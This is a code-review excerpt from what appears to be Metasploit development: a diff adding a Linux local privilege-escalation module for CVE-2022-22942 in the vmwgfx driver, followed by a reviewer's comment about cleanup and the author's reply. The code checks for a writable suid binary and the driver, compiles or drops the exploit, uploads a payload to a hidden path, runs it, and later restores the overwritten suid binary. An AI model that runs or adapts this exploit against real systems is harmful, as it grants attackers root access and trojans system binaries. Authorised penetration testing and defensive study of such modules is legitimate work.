modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb

```diff
@@ -0,0 +1,178 @@
+      @suid_target = '/bin/chage'
+    else
+      return CheckCode::Safe('Unable to write to /bin/chfn or /bin/chage')
+    end
+    vprint_good("#{@suid_target} suid binary found")
+
+    vmwgfx = cmd_exec('modinfo vmwgfx | grep version')
+    if vmwgfx.include? 'version'
+      return CheckCode::Appears('vmwgfx installed')
+    end
+
+    CheckCode::Safe('Vulnerable driver (vmwgfx) not found')
+  end
+
+  def exploit
+    # Check if we're already root
+    if is_root? && !datastore['ForceExploit']
+      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
+    end
+
+    # Make sure we can write our exploit and payload to the local system
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    # backup the suid binary before we overwrite it
+    @suid_backup = read_file(@suid_target)
+    path = store_loot(
+      @suid_target,
+      'application/octet-stream',
+      rhost,
+      @suid_backup,
+      @suid_target
+    )
+    print_good("Original #{@suid_target} backed up to #{path}")
+    executable_name = ".#{rand_text_alphanumeric(5..10)}"
+    executable_path = "#{base_dir}/#{executable_name}"
+    if live_compile?
+      vprint_status 'Live compiling exploit on system...'
+      payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+
+      c_code = exploit_data('CVE-2022-22942', 'cve-2022-22942-dc.c')
+      c_code = c_code.gsub('/dev/dri/card0', @driver) # ensure the right driver device is called
+      c_code = c_code.gsub('/bin/chfn', @suid_target) # ensure we have our suid target
+      c_code = c_code.gsub('/proc/self/exe', payload_path) # change exe to our payload
+
+      upload_and_compile executable_path, strip_comments(c_code)
+      register_files_for_cleanup(executable_path)
+    else
+      unless @suid_target == '/bin/chfn'
+        fail_with(Failure::BadConfig, 'Pre-compiled is only valid against Ubuntu based systems')
+      end
+      vprint_status 'Dropping pre-compiled exploit on system...'
+      payload_path = '/tmp/.aYd3GAMlK'
+      upload_and_chmodx executable_path, exploit_data('CVE-2022-22942', 'pre_compiled')
+    end
+
+    # Upload payload executable
+    print_status("Uploading payload to #{payload_path}")
+    upload_and_chmodx payload_path, generate_payload_exe
+    register_files_for_cleanup(generate_payload_exe)
+
+    print_status 'Launching exploit...'
+    output = cmd_exec executable_path, nil, 30
+    output.each_line { |line| vprint_status line.chomp }
+  end
+
+  # replace our suid target back to the original so we don't leave
+  def on_new_session(session)
+    super
+    if @suid_backup.nil?
+      print_bad("MANUAL replacement of trojaned #{@suid_target} is required.")
+    else
+      print_status("Replacing trojaned #{@suid_target} with original")
+      fd = session.fs.file.open(@suid_target, 'wb')
+      fd.write(@suid_backup)
+      fd.close
+    end
+  end
```

Comment:
`on_new_session` is only called when a session is created.

This cleanup won't be performed in instances where exploitation is successful but we don't get a session (ie, blocked egress firewall rules), or for payloads which do not create a session (ie, add user).

The usual approach is to perform cleanup in `cleanup` method and use a `@variable` to maintain state (ie, whether the backup executable will be restored).

Reply:
I believe (maybe i had shell issues at the time) that `cleanup` would happen on the original shell (lower privs) if there was an issue getting a new high priv shell (or a payload-less shell).  In that case, we wouldn't be able to write the non-trojan file back, so seemed to not make sense to try it anyways.